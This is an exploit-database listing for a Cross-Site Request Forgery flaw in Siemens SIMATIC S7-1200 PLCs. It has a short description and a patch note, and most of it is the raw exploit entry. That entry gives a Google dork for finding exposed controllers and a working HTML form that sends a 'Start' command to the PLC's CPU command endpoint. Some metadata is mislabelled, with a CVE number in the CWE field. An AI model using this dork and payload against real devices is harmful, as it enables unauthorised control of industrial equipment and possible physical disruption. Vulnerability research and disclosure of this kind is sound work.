header-logo
Suggest Exploit
vendor:
SIMATIC S7-1200 CPU family
by:
t4rkd3vilz, Jameel Nabbo
8.8
CVSS
HIGH
Cross-Site Request Forgery
352
CWE
Product Name: SIMATIC S7-1200 CPU family
Affected Version From: All versions prior to V4.1.3
Affected Version To: V4.1.3
Patch Exists: YES
Related CWE: CVE-2015-5698
CPE: h:siemens:simatic_s7-1200_cpu_family
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2018

Siemens SIMATIC S7-1200 CPU – Cross-Site Request Forgery

A Cross-Site Request Forgery (CSRF) vulnerability exists in Siemens SIMATIC S7-1200 CPU family, all versions prior to V4.1.3, which could allow an attacker to send malicious requests to the target system. An attacker can craft a malicious HTML form and submit it to the target system, which will then execute the malicious request without the user's knowledge or consent.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update their systems to the latest version.
Source

Exploit-DB raw data:

# Exploit Title: Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery
# Google Dork: inurl:/Portal/Portal.mwsl
# Date: 2018-05-21
# Exploit Author: t4rkd3vilz, Jameel Nabbo
# Vendor Homepage: https://www.siemens.com/
# Version: SIMATIC S7-1200 CPU family: All versions prior to V4.1.3
# Tested on: Kali Linux
# CVE: CVE-2015- 5698

# 1. Proof of Concept

<form method="POST" action="http://targetIp/CPUCommands">
    <input name="PriNav" value="Start">
    <input type="submit" value="Go!">
</form>

Navigation

Suggest Exploit

Services By CQR